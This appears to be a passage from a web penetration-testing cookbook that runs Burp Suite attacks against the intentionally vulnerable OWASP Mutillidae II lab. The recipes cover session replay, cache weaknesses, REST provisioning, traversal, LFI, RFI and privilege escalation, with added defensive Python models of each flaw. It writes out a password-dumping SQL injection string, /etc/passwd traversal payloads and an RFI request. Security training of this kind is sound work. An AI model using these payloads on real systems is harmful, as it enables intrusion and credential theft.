(Screenshot: Repeater, Target: http://192.168.56.101, with the unauthenticated 
GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 request on 
the left; the Response | Render tab on the right shows the OWASP Mutillidae II: 
Web Pwn in Mass Production home page header, Version: 2.6.24 Security Level: 0 
(Hosed) Hints: Enabled (1 - Script Kiddie), with no logged-in user.) 


12. Now flip over to the Repeater tab, which contains your second GET request 
as authenticated user admin. Copy the values for Referer header and 
Cookie from the authenticated request. This attack is parameter 
modification for the purpose of bypassing authentication: 




13. Copy the highlighted headers (Referer and Cookie) from the authenticated 
GET request. You are going to paste those values into the unauthenticated 
GET request. 

14. Replace the same headers in the unauthenticated GET request by 
highlighting them, right-clicking, and selecting Paste. 

15. Right-click and select Paste in the Repeater | Raw tab of the first GET 
request you performed as unauthenticated. 


16. Click the Go button to send your modified GET request. Remember, this is 
the first GET request you performed as unauthenticated. 

17. Verify that you are now logged in as admin in the Response | Render tab. 
We were able to bypass the authentication mechanism (that is, the login 
page) by performing parameter manipulation: 




How it works... 


By replaying both the session token found in the cookie and the Referer value of the 
authenticated request into the unauthenticated request, we are able to bypass the 
authentication scheme and gain unauthorized access to the application. 


Testing for browser cache weaknesses 


Browser caching is provided for improved performance and better end-user 
experience. However, when sensitive data is typed into a browser by the user, 
such data can also be cached in the browser history. This cached data is visible 
by examining the browser's cache or simply by pressing the browser's back 
button. 


Getting ready 


Using the browser's back button, determine whether login credentials are cached, 
allowing for unauthorized access. Examine these steps in Burp to understand the 
vulnerability. 


How to do it... 


1. Log into the Mutillidae application as admin with the password admin. 

2. Now log out of the application by clicking the Logout button from the top 
menu. 

3. Verify you are logged out by noting the Not Logged In message. 

4. View these steps as messages in Burp's Proxy | History as well. Note that the 
logout performs a 302 redirect in an effort to not cache cookies or 
credentials in the browser: 




5. From the Firefox browser, click the back button and notice that you are now 
logged in as admin even though you did not log in! This is possible because 
of cached credentials stored in the browser and the lack of any cache- 
control protections set in the application. 

6. Now refresh/reload the page in the browser, and you will see you are logged 
out again. 

7. Examine the steps within the Proxy | HTTP history tab. Review the steps 
you did through the browser against the messages captured in the Proxy | 
HTTP history table: 

o Request 1 in the following screenshot is unauthenticated 

o Request 35 is the successful login (302) as admin 

o Request 37 is the logout of the admin account 

o Requests 38 and 39 are the refresh or reload of the browser page, 
logging us out again 


8. There is no request captured when you press the browser's back button. 
This is because the back button action is contained in the browser. No 
message was sent through Burp to the web server to perform this action. 

This is an important distinction to note. Nonetheless, we found a 
vulnerability associated with weak browser-caching protection. In cases 
such as this, penetration testers will take a screenshot of the logged-in 
cached page, seen after clicking the back button: 
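As an added example (not code from the book or from Mutillidae), the following Python check flags a response that lacks the cache-control protections this recipe found missing. The sample responses are constructed; the well-protected one reuses the header set the Mutillidae REST endpoint returns later in this chapter.

```python
"""Audit an HTTP response for the cache-control protections whose absence lets a
logged-out page be redisplayed with the browser's back button.

Added example, not code from the book or from Mutillidae. Both sample responses
are constructed: GOOD_RESPONSE reuses the header set the Mutillidae REST
endpoint returns in this chapter; WEAK_RESPONSE carries no cache directives.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, List

GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 30 Aug 2018 16:05:26 GMT\r\n"
    "Expires: Thu, 19 Nov 1981 08:52:00 GMT\r\n"
    "Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\n"
    "Pragma: no-cache\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "Result: {Accounts: ...}"
)

WEAK_RESPONSE = (  # constructed: a post-login page served with no caching guidance at all
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 30 Aug 2018 16:05:26 GMT\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>Logged In Admin: admin</html>"
)


def parse_headers(raw_response: str) -> Dict[str, str]:
    """Map lower-cased header names to values from a raw HTTP response.

    Only the header block is read (up to the first blank line); the body is
    ignored. Repeated headers are joined with ", " as RFC 7230 allows.
    """
    headers: Dict[str, str] = {}
    lines = raw_response.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:  # skip the status line
        if line.strip() == "":
            break
        name, _, value = line.partition(":")
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers


def cache_control_directives(headers: Dict[str, str]) -> set:
    """Return the directive names in Cache-Control, e.g. {'no-store', 'max-age'}."""
    raw = headers.get("cache-control", "")
    return {part.strip().split("=", 1)[0].lower() for part in raw.split(",") if part.strip()}


def expires_in_future(headers: Dict[str, str]) -> bool:
    """True only if Expires parses to a date later than now.

    Values such as "0" or "-1" do not parse; RFC 7234 treats an invalid date
    as 'already expired', so they count as safe here.
    """
    value = headers.get("expires")
    if value is None:
        return False
    try:
        when = parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return False
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when > datetime.now(timezone.utc)


def audit_cache_headers(headers: Dict[str, str]) -> List[str]:
    """Return one finding per missing protection; an empty list means the page
    carries the full set (no-store, no-cache, Pragma and an expired Expires)."""
    findings: List[str] = []
    directives = cache_control_directives(headers)
    if "no-store" not in directives:
        findings.append("Cache-Control lacks no-store: browsers may keep the page in cache/history")
    if "no-cache" not in directives:
        findings.append("Cache-Control lacks no-cache: a stored copy may be reused without revalidation")
    if headers.get("pragma", "").lower() != "no-cache":
        findings.append("Pragma: no-cache missing: HTTP/1.0 caches get no instruction")
    if "expires" not in headers:
        findings.append("Expires missing: no explicit expiry for caches that ignore Cache-Control")
    elif expires_in_future(headers):
        findings.append("Expires is in the future: the page is explicitly marked cacheable")
    return findings


if __name__ == "__main__":
    for label, raw in (("REST response", GOOD_RESPONSE), ("post-login page", WEAK_RESPONSE)):
        print(label, audit_cache_headers(parse_headers(raw)) or ["OK"])
```

Run it against the raw response copied from Burp's Response | Raw tab; an empty finding list means the server asked the browser not to keep the page, which is the condition missing in this recipe.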


Testing the account provisioning process via the REST API 


Account provisioning is the process of establishing and maintaining user 
accounts within an application. Provisioning capabilities are usually restricted to 
administrator accounts. Penetration testers must validate that account-provisioning 
functions can only be performed by users who have provided proper identification and 
authorization. A common avenue for account provisioning is through Representational 
State Transfer (REST) API calls. Many times, developers may not put the same 
authorization checks in place for API calls as are used in the UI portion of an 
application. 


Getting ready 


Using REST API calls available in the OWASP Mutillidae II application, 
determine whether an unauthenticated API call can provision or modify users. 


How to do it... 


Make sure you are not logged into the application. If you are, click the Logout 
button from the top menu. 


1. Within Mutillidae, browse to the User Lookup (SQL) page by selecting 
OWASP 2013 | A1 Injection (SQL) | SQLi - Extract Data | User Info 
(SQL): 




2. Type user for Name and user for Password, and click View Account 
Details. You should see the results shown in the next screenshot. This is the 
account we will test provisioning functions against, using REST calls: 




Through Spidering, Burp can find /api or /rest folders. Such folders are 
clues that an application is REST API enabled. A tester needs to 
determine which functions are available through these API calls. 


3. For Mutillidae, the /webservices/rest/ folder structure offers account 
provisioning through REST API calls. 

4. To go directly to this structure within Mutillidae, select Web Services | 
REST | SQL Injection | User Account Management: 




You are presented with a screen describing the supported REST calls and 
parameters required for each call: 


Help: This service exposes GET, POST, PUT, DELETE methods. This service is vulnerable to SQL injection in security level 0. 

DEFAULT GET: (without any parameters) will display this help plus a list of accounts in the system. 
Optional params: None. 

GET: Either displays usernames of all accounts or the username and signature of one account. 
Optional params: username AS URL parameter. If username is "*" then all accounts are returned. 
Example(s): 
Get a particular user: /mutillidae/webservices/rest/ws-user-account.php?username=adrian 
Get all users: /mutillidae/webservices/rest/ws-user-account.php 

POST: Creates new account. 
Required params: username, password AS POST parameter. 
Optional params: signature AS POST parameter. 

PUT: Creates or updates account. 
Required params: username, password AS POST parameter. 
Optional params: signature AS POST parameter. 


5. Let's try to invoke one of the REST calls. Go to the Proxy | HTTP history 
table and select the latest request you sent from the menu to reach the User 
Account Management page. Right-click and send this request to 
Repeater: 




6. In Burp's Repeater, append ? followed by the parameter name/value pair 
username=user to the URL. The new URL should be as follows: 


/mutillidae/webservices/rest/ws-user-account.php?username=user 




7. Click the Go button and notice we are able to retrieve data as an 
unauthenticated user! No authentication token is required to perform such 
actions: 


HTTP/1.1 200 OK 
Result: {Accounts: {[{"username": "user", "mysignature": "User Account"}]}} 


8. Let's see what else we can do. Using the SQL Injection string given on the 
User Account Management page, let's attempt to dump the entire user 
table. 

9. Append the following value after username=: 


user'+union+select+concat('The+password+for+',username,'+is+',+password),mysignature+from+accounts+--+ 


The new URL should be the following one: 


/mutillidae/webservices/rest/ws-user-account.php?username=user'+union+select+concat('The+password+for+',username,'+is+',+password),mysignature+from+accounts+--+ 


10. Click the Go button after making the change to the username parameter. 
Your request should look as shown in the following screenshot: 




11. Notice we dumped all of the accounts in the database, displaying all 
usernames, passwords, and signatures: 




12. Armed with this information, return to Proxy | HTTP History, select the 
request you made to see the User Account Management page, right-click, 
and send to Repeater. 


13. In Repeater, modify the GET verb and replace it with DELETE within the 
Raw tab of the Request: 




14. Move to the Params tab, click the Add button, and add two Body type 
parameters: first, a username with the value set to user, and second, a 
password with the value set to user, and then click the Go button: 




15. Notice we deleted the account! We were able to retrieve information and 
even modify (delete) rows within the database without ever showing an API 
key or authentication token! 


HTTP/1.1 200 OK 
Result: {Deleted account user} 


Note: If you wish to re-create the user account, repeat the previous steps, 
replacing DELETE with PUT. A signature is optional. Click the Go button. The user 
account is re-created. 
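An added example, not Mutillidae's own code, that models this endpoint's behaviour in Python: vulnerable_handler never consults the session (the behaviour observed in steps 7 to 15), while hardened_handler holds the API to the same admin-only rule the UI applies. The Session class, the role names and the sample accounts are constructed.

```python
"""Model of an account-provisioning REST endpoint in the shape of Mutillidae's
ws-user-account.php, first without any authorization check and then hardened.

Added example, not Mutillidae's code. Session, the role names and the sample
accounts are constructed; handlers return (status, body) rather than an HTTP
response so the module runs stand-alone.
"""
from dataclasses import dataclass
from typing import Any, Dict, Optional, Tuple

Store = Dict[str, Dict[str, str]]
Result = Tuple[int, Any]

STATE_CHANGING = {"POST", "PUT", "DELETE"}


@dataclass(frozen=True)
class Session:
    """What the server knows about the caller once the session cookie is validated."""
    username: str
    role: str  # constructed: "admin" or "user"


def sample_store() -> Store:
    """Constructed accounts table; the 'user' row matches the one looked up in step 2."""
    return {
        "admin": {"password": "admin", "mysignature": "g0t r00t?"},
        "user": {"password": "user", "mysignature": "User Account"},
    }


def dispatch(store: Store, method: str, params: Dict[str, str]) -> Result:
    """The service's actual work, following its help text: GET lists accounts or
    shows one, POST creates, PUT creates or updates, DELETE removes."""
    username = params.get("username")
    if method == "GET":
        if username in (None, "*"):
            return 200, {"Accounts": [{"username": u} for u in sorted(store)]}
        if username not in store:
            return 404, {"error": f"no account {username}"}
        return 200, {"Accounts": [{"username": username,
                                   "mysignature": store[username]["mysignature"]}]}
    if method in ("POST", "PUT"):
        if not username or "password" not in params:
            return 400, {"error": "username and password are required"}
        if method == "POST" and username in store:
            return 409, {"error": f"account {username} exists"}
        store[username] = {"password": params["password"],
                           "mysignature": params.get("signature", "")}
        return 200, f"Saved account {username}"
    if method == "DELETE":
        if username not in store:
            return 404, {"error": f"no account {username}"}
        del store[username]
        return 200, f"Deleted account {username}"
    return 405, {"error": f"{method} not supported"}


def vulnerable_handler(store: Store, method: str, params: Dict[str, str],
                       session: Optional[Session] = None) -> Result:
    """The behaviour observed in this recipe: the session is never consulted, so
    an unauthenticated DELETE removes the account exactly as an admin's would."""
    return dispatch(store, method, params)


def authorize(method: str, params: Dict[str, str],
              session: Optional[Session]) -> Optional[Result]:
    """Return None when the call may proceed, otherwise the error to send back.
    The API is held to the same rule as the UI: provisioning is an admin function."""
    if session is None:
        return 401, {"error": "authentication required"}
    if method in STATE_CHANGING and session.role != "admin":
        return 403, {"error": "provisioning requires the admin role"}
    if method == "GET":
        target = params.get("username", "*")
        # A wildcard listing or another user's record is admin-only; users may read their own.
        if session.role != "admin" and target != session.username:
            return 403, {"error": "you may only view your own account"}
    return None


def hardened_handler(store: Store, method: str, params: Dict[str, str],
                     session: Optional[Session] = None) -> Result:
    """Same service, but every call passes through authorize() first."""
    denied = authorize(method, params, session)
    if denied is not None:
        return denied
    return dispatch(store, method, params)


if __name__ == "__main__":
    accounts = sample_store()
    print(vulnerable_handler(accounts, "DELETE", {"username": "user"}))  # deleted, no session needed
    accounts = sample_store()
    print(hardened_handler(accounts, "DELETE", {"username": "user"}))    # 401, account kept
    print(hardened_handler(accounts, "DELETE", {"username": "user"}, Session("admin", "admin")))
```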


Assessing Authorization Checks 


In this chapter, we will cover the following recipes: 


Testing for directory traversal 
Testing for Local File Include (LFI) 
Testing for Remote File Include (RFI) 
Testing for privilege escalation 
Testing for insecure direct object reference 


Introduction 


This chapter covers the basics of authorization, including an explanation of how 
an application uses roles to determine user functions. Web penetration testing 
involves key assessments to determine how well the application validates 
functions assigned to a given role, and we will learn how to use Burp to perform 
such tests. 


Software requirements 


To complete the recipes in this chapter, you will need the following: 


• OWASP broken web applications (VM) 
    ◦ OWASP mutillidae link 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 
• Firefox browser configured to allow Burp to proxy traffic 
(https://www.mozilla.org/en-US/firefox/new/) 
• The wfuzz wordlist repository from GitHub 
(https://github.com/xmendez/wfuzz) 


Testing for directory traversal 


Directory traversal attacks are attempts to discover, or forcibly browse to, 
unauthorized web pages usually designed for administrators of the application. If 
an application does not configure the web document root properly and does not 
include proper authorization checks for each page accessed, a directory traversal 
vulnerability could exist. In particular situations, such a weakness could lead to 
system command injection attacks or the ability of an attacker to perform 
arbitrary code execution. 


Getting ready 


Using OWASP Mutillidae II as our target application, let's determine whether it 
contains any directory traversal vulnerabilities. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login.php page. Highlight the message, move your 
cursor into the Raw tab of the Request tab, right-click, and click on Send 
to Intruder: 




4. Switch over to the Intruder | Positions tab, and clear all Burp-defined 
payload markers by clicking the Clear § button on the right-hand side. 


5. Highlight the value currently stored in the page parameter (login.php), and 
place a payload marker around it using the Add § button: 




6. Continue to the Intruder | Payloads tab, and select the following wordlist 
from the wfuzz repository: admin-panels.txt. The location of the wordlist 
from the GitHub repository follows this folder structure: 
wfuzz/wordlist/general/admin-panels.txt. 


7. Click the Load button within the Payload Options [Simple list] section of 
the Intruder | Payloads tab, and a popup will display, prompting for the 
location of your wordlist. 

8. Browse to the location where you downloaded the wfuzz repository from 
GitHub. Continue to search through the wfuzz folder structure 
(wfuzz/wordlist/general/) until you reach the admin-panels.txt file, and 
then select the file by clicking Open: 


9. Scroll to the bottom and uncheck (by default, it is checked) the option 
URL-encode these characters: 


10. You are now ready to begin the attack. Click the Start attack button at the 
top right-hand corner of the Intruder | Positions page: 


11. The attack results table will appear. Allow the attacks to complete. There 
are 137 payloads in the admin-panels.txt wordlist. Sort the Length 
column in descending order, to see which of the payloads 
hit a web page. 

Notice the payloads that have larger response lengths. This looks 
promising! Perhaps we have stumbled upon some administration pages that 
may contain fingerprinting information or unauthorized access: 




12. Select the first page in the list with the largest length, administrator.php. 
From the attack results table, look at the Response | Render tab, and notice 
the page displays the PHP version and the system information: 




How it works... 


Without even being logged in, we were able to force browse to an area of the 
web application that was unmapped. The term unmapped means the application 
itself had no direct link to this secret configuration page. However, using Burp 
Intruder and a wordlist containing commonly known administration file names, 
we were able to discover the page using the directory traversal attack. 


Testing for Local File Include (LFI) 


Web servers control access to privileged files and resources through 
configuration settings. Privileged files include files that should only be 
accessible by system administrators, for example, the /etc/passwd file on 
UNIX-like platforms or the boot.ini file on Windows systems. 


An LFI attack is an attempt to access privileged files using directory traversal 
attacks. LFI attacks come in different styles, including the dot-dot-slash attack 
(../), directory brute-forcing, directory climbing, or backtracking. 
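As an added example (not Mutillidae's code), this Python model shows how a page= parameter joined straight onto the web root lets the dot-dot-slash payloads used in this recipe escape it, and how a hardened resolver refuses them. WEB_ROOT and ALLOWED_PAGES are constructed, and resolution is purely lexical, so no file is opened.

```python
"""Toy model of the page= include behind Mutillidae's index.php, first resolved
naively and then through a hardened resolver.

Added example, not Mutillidae's code. WEB_ROOT and ALLOWED_PAGES are constructed,
and resolution uses posixpath only (lexical), so nothing on disk is touched.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/mutillidae"                              # constructed document root
ALLOWED_PAGES = {"home.php", "login.php", "user-info.php"}    # constructed allow-list


def vulnerable_resolve(page: str) -> str:
    """Decode the parameter (as the web server would) and join it onto the web
    root. Dot-dot-slash segments walk out of the root and an absolute path
    replaces it entirely; this is what let the Traversal.txt payloads in this
    recipe reach /etc/hosts and /etc/passwd."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(page)))


def is_within(root: str, candidate: str) -> bool:
    """True if candidate is root itself or lies beneath it (lexical check only)."""
    return posixpath.commonpath([root, candidate]) == root


def hardened_resolve(page: str) -> Optional[str]:
    """Return the file to include, or None if the request must be refused.

    Decode first, so an encoded traversal ("..%2F") or an encoded NUL ("%00",
    which truncated the appended extension on old PHP builds) is checked in
    the same form the include would see.
    """
    decoded = unquote(page)
    if "\x00" in decoded:
        return None                    # embedded NUL is never a legitimate page name
    if "/" in decoded or "\\" in decoded or decoded.startswith("."):
        return None                    # only a bare file name is acceptable
    if decoded not in ALLOWED_PAGES:
        return None                    # primary control: a fixed allow-list of pages
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if not is_within(WEB_ROOT, candidate):
        return None                    # defence in depth should the list ever widen
    return candidate


if __name__ == "__main__":
    for payload in ("login.php", "../../../../etc/hosts",
                    "../../../../etc/passwd%00", "/etc/passwd"):
        print(f"{payload!r:32} naive={vulnerable_resolve(payload)!r:28} "
              f"hardened={hardened_resolve(payload)!r}")
```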


Getting ready 


Using OWASP Mutillidae II as our target application, let's determine whether it 
contains any LFI vulnerabilities. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login.php page. Highlight the message, move your 
cursor into the Raw tab of the Request tab, right-click, and select Send to 
Intruder. 

4. Switch over to the Intruder | Positions tab, and clear all Burp-defined 
payload markers by clicking the Clear § button on the right-hand side. 

5. Highlight the value currently stored in the page parameter (login.php), and 
place a payload marker around it using the Add § button on the right-hand 
side. 

6. Continue to the Intruder | Payloads tab. Select the following wordlist 
from the wfuzz repository: Traversal.txt. The location of the wordlist 
from the GitHub repository follows this folder structure: 
wfuzz/wordlist/injections/Traversal.txt. 

7. Click the Load button within the Payload Options [Simple list] section of 
the Intruder | Payloads tab. A popup will display, prompting for the 
location of your wordlist. 

8. Browse to the location where you downloaded the wfuzz repository from 
GitHub. Continue to search through the wfuzz folder structure until you reach 
the Traversal.txt file. Select the file and click Open: 




9. Scroll to the bottom and uncheck (by default, it is checked) the option 
URL-encode these characters. 

10. You are now ready to begin the attack. Click the Start attack button at the 
top-right-hand corner of the Intruder | Positions page. 


11. The attack results table will appear. Allow the attacks to complete. Sort 
the Length column in descending order, to see which of the 
payloads hit a web page. Notice the payloads with larger lengths; perhaps 
we gained unauthorized access to the system configuration files! 




12. Select Request #2 in the list. From the attack results table, look at 
the Response | Render tab and notice the page displays the hosts file from 
the system! 




13. Continue scrolling down the list of requests in the attack results table. Look 
at request #6, and then look at the Response | Render tab and notice the 
page displays the /etc/passwd file from the system! 


[Screenshot: Intruder attack results with request 6 (../../../../etc/passwd) selected. The Response | Render tab shows the target's /etc/passwd inside the Mutillidae page, beginning:]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
landscape:x:104:122::/var/lib/landscape:/bin/false


How it works... 


The parameter that selects the file to load is handed to a PHP include without 
validation or canonicalization, so ../ sequences walk out of the web root, and 
the application performs no authorization check on what it is about to read. 
Any file the web server process (www-data) can read is therefore exposed: 
/etc/hosts and /etc/passwd are world-readable, which is why those payloads 
return content, whereas /etc/shadow is readable only by root and should not be 
expected to appear even when the traversal works. The %00 variants exist 
because PHP versions before 5.3.4 (the target runs PHP 5.3.2) truncated file 
paths at a NUL byte, discarding any suffix such as .php that the application 
appended to the supplied name. 


Testing for Remote File Inclusion 
(RFI) 


Remote File Inclusion (RFI) is an attack in which the application is made to 
load a file from an external, remotely located URL. The attack is possible 
because a parameter that selects the file to include is taken from the request 
without server-side checks, so its value is neither restricted to a whitelist 
of acceptable pages nor sanitized with proper data validation. In PHP, an 
included remote file is executed as code on the server, so a successful RFI 
usually amounts to remote code execution rather than merely an unexpected page. 


Getting ready 


Using OWASP Mutillidae II as our target application, let's determine whether it 
contains any RFI vulnerabilities. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. Find the request you just performed within the Proxy | HTTP history table. 
Look for the call to the login.php page: 


[Screenshot: Proxy | HTTP history, Filter: Hiding CSS, image and general binary content, with request #378 to http://192.168.56.101 selected. The Request | Raw tab shows:]

GET /mutillidae/index.php?page=login.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0
Cookie: showhints=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1


4. Make a note of the page parameter that determines the page to load: 


GET /mutillidae/index.php?page=login.php HTTP/1.1


Let's see if we can exploit this parameter by providing a URL that is 
outside the application. For demonstration purposes, we will use a URL 
that we control in the OWASP BWA VM. However, in the wild, this URL 
would be attacker-controlled instead. 


5. Switch to the Proxy | Intercept tab, and press the Intercept is on button. 
6. Return to the Firefox browser, and reload the login page. The request is 
paused and contained within the Proxy | Intercept tab: 




7. Now let's manipulate the value of the page parameter from login.php to a 
URL that is external to the application. Let's use the login page to the 
GetBoo application. Your URL will be specific to your machine's IP 
address, so adjust accordingly. The new URL will be 
http://<your_IP_address>/getboo/ 

8. Replace the login.php value with http://<your_IP_address>/getboo/ 
and click the Forward button: 


[Screenshot: Proxy | Intercept, Request to http://192.168.56.101:80, Intercept is on. The edited request reads:]

GET /mutillidae/index.php?page=http://192.168.56.101/getboo/ HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0
Cookie: showhints=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


9. Now press the Intercept is on button again to toggle intercept OFF 
(Intercept is off). 

10. Return to the Firefox browser, and notice the page loaded is the GetBoo 
index page within the context of the Mutillidae application! 
[Screenshot: the GetBoo index page ("Welcome to getboo! The social bookmarking open-source platform.", with its About / Help / Register / Log In links and the "Please remove the /install folder now" notice) rendered inside the Mutillidae page frame, which still shows the Toggle Security, Enforce SSL, Reset DB, View Log and View Captured Data menu and Not Logged In.]


How it works... 


The page parameter has no data validation to ensure the values provided to it 
are whitelisted or restricted to a prescribed list of acceptable values. Because 
the value is handed to a PHP include and the interpreter is allowed to include 
remote URLs (allow_url_include), we can point the parameter at any host we 
choose. In this demonstration the included GetBoo page merely renders inside 
Mutillidae; an attacker would instead serve PHP from the remote URL and have it 
executed on the server. 
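The following is an added example, not code from the book or from Mutillidae, that models in Python what the two preceding recipes (the Intruder traversal attack and the RFI against the page parameter) exploit: an include path built from user input with no validation, next to a hardened resolver. The web root path, the allowlist of page names and the sample payloads are constructed for the example; the NUL-byte truncation mirrors the behaviour of PHP releases before 5.3.4.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-ins: the web root Mutillidae lives under and the pages
# index.php is meant to dispatch to. Neither value is taken from the application.
WEB_ROOT = "/var/www/mutillidae"
ALLOWED_PAGES = {"home.php", "login.php", "source-viewer.php", "user-info.php"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def _inside_root(path):
    return path == WEB_ROOT or path.startswith(WEB_ROOT + "/")


def vulnerable_resolve(page_param):
    """What an unvalidated include($page) on PHP 5.3.2 ends up opening.

    Returns the local path or the remote URL the include would fetch.
    """
    page = unquote(page_param)          # PHP has already URL-decoded $_GET["page"]
    if page.lower().startswith(REMOTE_SCHEMES):
        return page                     # allow_url_include=On: fetched and run as PHP
    # Before PHP 5.3.4 the path went to the C library unchanged, and C strings
    # end at the first NUL, so "../../../../etc/passwd\0" opens /etc/passwd.
    page = page.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def hardened_resolve(page_param):
    """Allowlist first, canonicalise second, and reject everything else."""
    page = unquote(page_param)
    if "\x00" in page or page not in ALLOWED_PAGES:
        return None
    full = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    # Defence in depth: an allowlisted name must still resolve under the web root.
    if not _inside_root(full):
        return None
    return full


def classify(page_param):
    """Label a payload the way you would triage an Intruder result row."""
    target = vulnerable_resolve(page_param)
    if hardened_resolve(page_param) is not None:
        return "legitimate"
    if target.lower().startswith(REMOTE_SCHEMES):
        return "RFI"
    if not _inside_root(target):
        return "LFI"
    return "blocked"


if __name__ == "__main__":
    # Constructed sample payloads, mirroring the ones used in the two recipes.
    for payload in ("login.php", "../../../../etc/passwd%00", "../../../../etc/hosts",
                    "http://192.168.56.101/getboo/", "foo.php"):
        print(f"{payload:32} -> {classify(payload):10} {vulnerable_resolve(payload)}")
```

The allowlist check runs before any path manipulation on purpose: once a value has been canonicalized it is tempting to accept anything that "looks" local, but a name-based allowlist is what actually closes both the traversal and the remote URL at once.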


Testing for privilege escalation 


Developer code in an application must include authorization checks on assigned 
roles to ensure an authorized user is not able to elevate their role to a higher 
privilege. Such privilege escalation attacks occur by modifying the value of the 
assigned role and replacing the value with another. In the event that the attack is 
successful, the user gains unauthorized access to resources or functionality 
normally restricted to administrators or more-powerful accounts. 


Getting ready 


Using OWASP Mutillidae II as our target application, let's log in as a regular 
user, John, and determine whether we can escalate our role to admin. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 


Mutillidae II application. 
2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 


From the top menu, click Login. 
3. At the login screen, log in with these credentials—username: john 


and password: monkey. 


4. Switch to Burp's Proxy | HTTP history tab. Find the POST and subsequent 
GET requests you just made by logging in as john: 


[Screenshot: Proxy | HTTP history, Filter: Hiding CSS, image and general binary content, listing the login POST and the GET that follows it.]

5. Look at the GET request from the listing; notice the cookie name/value pairs 
shown on the Cookie: line. 


The name/value pairs of most interest include username=john and uid=3. 
What if we attempt to manipulate these values to a different role? 


[Screenshot: Proxy | HTTP history. Entry 426, POST /mutillidae/index.php?page=login.php to http://192.168.56.101 (status 302, length 50912), is followed by a GET (status 200, length 6550). The Request | Raw tab of the GET shows:]

GET /mutillidae/index.php?popUpNotificationCode=AU1 HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: showhints=1; username=john; uid=3; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1

